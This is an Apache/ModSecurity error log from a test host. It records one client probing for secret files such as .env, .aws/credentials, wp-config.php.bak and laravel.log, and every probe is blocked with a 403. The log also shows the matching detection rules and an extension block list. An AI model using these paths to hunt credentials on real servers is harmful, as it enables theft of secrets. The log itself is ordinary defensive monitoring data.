[Wed Dec 10 07:48:00.581644 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTkXoJV8tnhi0nExSI591gAAAAo"]
[Wed Dec 10 07:48:00.581906 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTkXoJV8tnhi0nExSI591gAAAAo"]
[Wed Dec 10 07:48:00.582092 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTkXoJV8tnhi0nExSI591gAAAAo"]
[Wed Dec 10 07:48:00.609000 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTkXoJV8tnhi0nExSI591wAAAAo"]
[Wed Dec 10 07:48:00.609256 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTkXoJV8tnhi0nExSI591wAAAAo"]
[Wed Dec 10 07:48:00.609446 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTkXoJV8tnhi0nExSI591wAAAAo"]
[Wed Dec 10 07:48:00.640702 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTkXoJV8tnhi0nExSI592AAAAAo"]
[Wed Dec 10 07:48:00.640942 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTkXoJV8tnhi0nExSI592AAAAAo"]
[Wed Dec 10 07:48:00.641155 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTkXoJV8tnhi0nExSI592AAAAAo"]
[Wed Dec 10 07:48:00.675992 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTkXoJV8tnhi0nExSI592QAAAAo"]
[Wed Dec 10 07:48:00.676223 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTkXoJV8tnhi0nExSI592QAAAAo"]
[Wed Dec 10 07:48:00.676428 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTkXoJV8tnhi0nExSI592QAAAAo"]
[Wed Dec 10 07:48:00.707563 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTkXoJV8tnhi0nExSI592gAAAAo"]
[Wed Dec 10 07:48:00.707795 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTkXoJV8tnhi0nExSI592gAAAAo"]
[Wed Dec 10 07:48:00.707998 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTkXoJV8tnhi0nExSI592gAAAAo"]
[Wed Dec 10 07:48:00.749968 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTkXoJV8tnhi0nExSI592wAAAAo"]
[Wed Dec 10 07:48:00.750223 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTkXoJV8tnhi0nExSI592wAAAAo"]
[Wed Dec 10 07:48:00.750437 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTkXoJV8tnhi0nExSI592wAAAAo"]
[Wed Dec 10 07:48:00.923849 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTkXoJV8tnhi0nExSI593AAAAAo"]
[Wed Dec 10 07:48:00.924084 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTkXoJV8tnhi0nExSI593AAAAAo"]
[Wed Dec 10 07:48:00.924332 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTkXoJV8tnhi0nExSI593AAAAAo"]
[Wed Dec 10 07:48:00.960340 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aTkXoJV8tnhi0nExSI593QAAAAo"]
[Wed Dec 10 07:48:00.960468 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aTkXoJV8tnhi0nExSI593QAAAAo"]
[Wed Dec 10 07:48:00.960689 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aTkXoJV8tnhi0nExSI593QAAAAo"]
[Wed Dec 10 07:48:00.960879 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aTkXoJV8tnhi0nExSI593QAAAAo"]
[Wed Dec 10 07:48:02.516099 2025] [:error] [pid 642265] [client 45.148.10.247:51876] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTkXorP2BPelBlHY7gEejAAAAAs"]
[Wed Dec 10 07:48:02.516422 2025] [:error] [pid 642265] [client 45.148.10.247:51876] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTkXorP2BPelBlHY7gEejAAAAAs"]
[Wed Dec 10 07:48:02.516627 2025] [:error] [pid 642265] [client 45.148.10.247:51876] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTkXorP2BPelBlHY7gEejAAAAAs"]
[Wed Dec 10 07:48:25.920162 2025] [authz_core:error] [pid 642264] [client 45.148.10.247:40726] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Wed Dec 10 07:48:26.112067 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aTkXurP2BPelBlHY7gEejwAAAAs"]
[Wed Dec 10 07:48:26.112313 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aTkXurP2BPelBlHY7gEejwAAAAs"]
[Wed Dec 10 07:48:26.112493 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aTkXurP2BPelBlHY7gEejwAAAAs"]
[Wed Dec 10 07:48:26.573818 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aTkXurP2BPelBlHY7gEelQAAAAs"]
[Wed Dec 10 07:48:26.574059 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aTkXurP2BPelBlHY7gEelQAAAAs"]
[Wed Dec 10 07:48:26.574320 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aTkXurP2BPelBlHY7gEelQAAAAs"]
[Wed Dec 10 07:48:26.828178 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aTkXurP2BPelBlHY7gEemAAAAAs"]
[Wed Dec 10 07:48:26.828414 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aTkXurP2BPelBlHY7gEemAAAAAs"]
[Wed Dec 10 07:48:26.828612 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aTkXurP2BPelBlHY7gEemAAAAAs"]
[Wed Dec 10 07:48:28.030408 2025] [:error] [pid 642265] [client 45.148.10.247:40736] [client 45.148.10.247] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aTkXvLP2BPelBlHY7gEeogAAAAs"]
